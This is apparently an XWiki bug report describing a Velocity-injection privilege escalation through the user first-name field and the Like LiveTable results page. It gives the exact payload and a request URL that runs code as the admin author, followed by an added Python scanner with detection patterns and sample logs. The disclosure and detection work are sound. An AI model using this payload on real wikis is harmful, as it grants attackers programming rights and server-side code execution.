Details
- Type: Bug
- Resolution: Solved By
- Priority: Blocker
- Affects Version: 12.9-rc-1
- Unknown
- N/A
- N/A
Description
Steps to reproduce:
- In the user profile, set your first name to
  {{cache timeToLive=1}}{{velocity}}#evaluate($request.eval)
- Click on the Like button at the bottom left of your user profile.
- Open <xwiki-host>/xwiki/bin/get/XWiki/Like/Code/LiveTableResultPage?outputSyntax=plain&offset=0&limit=10&eval=%23set(%24mydoc%20%3D%20%24doc.getDocument())%20%24mydoc.setContentAuthorReference(%22xwiki%3AXWiki.Admin%22)%20%24mydoc.setTitle(%22Hello%20World%22)%20%24mydoc.getTitle(), where <xwiki-host> is the URL of your XWiki installation.
Expected result:
The property
"doc_title":"Profile of {{cache timeToLive=1}}{{velocity}}#evaluate($request.eval)"
is in the JSON.
Actual result:
The property "doc_title":"Profile of Hello World " is in the result, showing that the Velocity code passed in the URL parameter eval has been executed with programming rights.
This demonstrates a privilege escalation from a regular account to programming rights, caused by missing escaping of the user-controlled first name in the LiveTable results page. While this document was introduced in 13.4-rc-1, the same code was also present in XWiki.Like.UserProfileUIX in earlier versions, so the true Affects Version is probably older.
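For defenders, the report above gives two concrete indicators: a profile field carrying wiki macro or Velocity syntax, and a LiveTableResultPage request whose query parameters carry Velocity directives. The scanner below is an added example written for this page (it is not XWiki project code and does not depend on XWiki); it checks both an access-log line and a profile-field dictionary for those indicators. The log lines, the profile values and the `INDICATORS` pattern list are constructed for the demo, and the list is an assumption about what such syntax looks like, not an exhaustive signature set.

```python
"""Flag HTTP requests and profile-field values that carry XWiki macro or
Velocity syntax, the indicators behind the LiveTableResultPage report above.

Added example, not part of the XWiki project. All sample data is constructed.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Assumed indicator set: wiki macro openers and Velocity directives/references
# that have no business in a user's name or in a LiveTable query parameter.
INDICATORS = [
    re.compile(r"\{\{\s*(velocity|cache|groovy|python|html)\b", re.I),
    re.compile(r"#(evaluate|set|include|macro)\s*\("),
    re.compile(r"\$(request|doc|xwiki|services|context)\b"),
]


def suspicious_fragments(text):
    """Return the indicator matches found in text (empty list if clean)."""
    return [m.group(0) for pat in INDICATORS for m in pat.finditer(text)]


# Matches the request part of a common-log-format line: "GET /path?query HTTP/1.1"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def inspect_request_line(line):
    """Parse one access-log line and return {"path", "params"} for any query
    parameter whose decoded value carries an indicator, or None if clean."""
    m = LOG_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    findings = {}
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already decoded once; decode again to catch double-encoding
        hits = suspicious_fragments(unquote_plus(value))
        if hits:
            findings[name] = hits
    return {"path": parts.path, "params": findings} if findings else None


def inspect_profile(profile):
    """Check free-text profile fields (a dict of field -> value) for the same
    indicators; returns {field: [matches]} for the fields that hit."""
    result = {}
    for field, value in profile.items():
        hits = suspicious_fragments(value)
        if hits:
            result[field] = hits
    return result


# Constructed sample data: one request carrying a Velocity "eval" parameter as in
# the report, one benign LiveTable request, and a profile with the reported name.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /xwiki/bin/get/XWiki/Like/Code/'
    'LiveTableResultPage?outputSyntax=plain&offset=0&limit=10'
    '&eval=%23set(%24mydoc%20%3D%20%24doc.getDocument())%20%24mydoc.getTitle() HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /xwiki/bin/get/XWiki/Like/Code/'
    'LiveTableResultPage?outputSyntax=plain&offset=0&limit=10 HTTP/1.1" 200 480',
]
SAMPLE_PROFILE = {
    "first_name": "{{cache timeToLive=1}}{{velocity}}#evaluate($request.eval)",
    "last_name": "Smith",
}

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(inspect_request_line(line))
    print(inspect_profile(SAMPLE_PROFILE))
```

Running the block prints the flagged `eval` parameter for the first log line, `None` for the benign request, and the four indicator fragments found in the first-name field. The same `suspicious_fragments` check is what a server-side input filter or a periodic audit of stored profile fields would apply; the real fix, as the report says, is escaping the first name where the LiveTable results page emits it.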
Attachments
Issue Links
- is related to
  - XWIKI-19900 Liked page whose FULLNAME contains dot(.) can not show in user profile. (Closed)
  - XWIKI-17733 Use a LiveTable to display the page liked in user profile (Closed)
- links to